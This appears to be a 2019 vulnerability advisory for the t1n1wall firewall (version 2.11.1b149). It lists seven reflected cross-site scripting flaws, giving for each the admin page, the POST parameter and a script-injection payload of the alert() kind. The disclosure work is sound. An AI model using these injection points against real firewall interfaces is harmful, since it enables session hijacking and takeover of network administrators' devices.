t1n1wall version 2.11.1b149 suffers from a cross site scripting vulnerability.
c29e8bcca327b308f63da123caa94396##################################################################################################################################
# Exploit Title: t1n1wall 2.11.1b149 | Cross-Site Scripting
# Date: 02.02.2019
# Exploit Author: Ozer Goker
# Vendor Homepage: http://t1n1wall.com
# Software Link:
https://sourceforge.net/projects/t1n1wall/files/latest/download
# Version: 2.11.1b149
##################################################################################################################################
Introduction
t1n1wall
As m0n0wall decided to close it's doors, and no further development is
planned, I have created a fork.
follow links above for downloads
#################################################################################
XSS details: Reflected
#################################################################################
XSS1 | Reflected
URL
http://192.168.2.200/vpn_ipsec_edit.php
METHOD
Post
PARAMETER
remotenet
PAYLOAD
"><script>alert(1)</script>
#################################################################################
XSS2 | Reflected
URL
http://192.168.2.200/vpn_ipsec_edit.php
METHOD
Post
PARAMETER
remotegw
PAYLOAD
"><script>alert(2)</script>
#################################################################################
XSS3 | Reflected
URL
http://192.168.2.200/vpn_ipsec_edit.php
METHOD
Post
PARAMETER
p1myident
PAYLOAD
"><script>alert(3)</script>
#################################################################################
XSS4 | Reflected
URL
http://192.168.2.200/vpn_ipsec_edit.php
METHOD
Post
PARAMETER
p1lifetime
PAYLOAD
"><script>alert(4)</script>
#################################################################################
XSS5 | Reflected
URL
http://192.168.2.200/vpn_ipsec_edit.php
METHOD
Post
PARAMETER
p2lifetime
PAYLOAD
"><script>alert(5)</script>
#################################################################################
XSS6 | Reflected
URL
http://192.168.2.200/diag_ping.php
METHOD
Post
PARAMETER
host
PAYLOAD
"><script>alert(6)</script>
#################################################################################
XSS7 | Reflected
URL
http://192.168.2.200/diag_traceroute.php
METHOD
Post
PARAMETER
host
PAYLOAD
"><script>alert(7)</script>
#################################################################################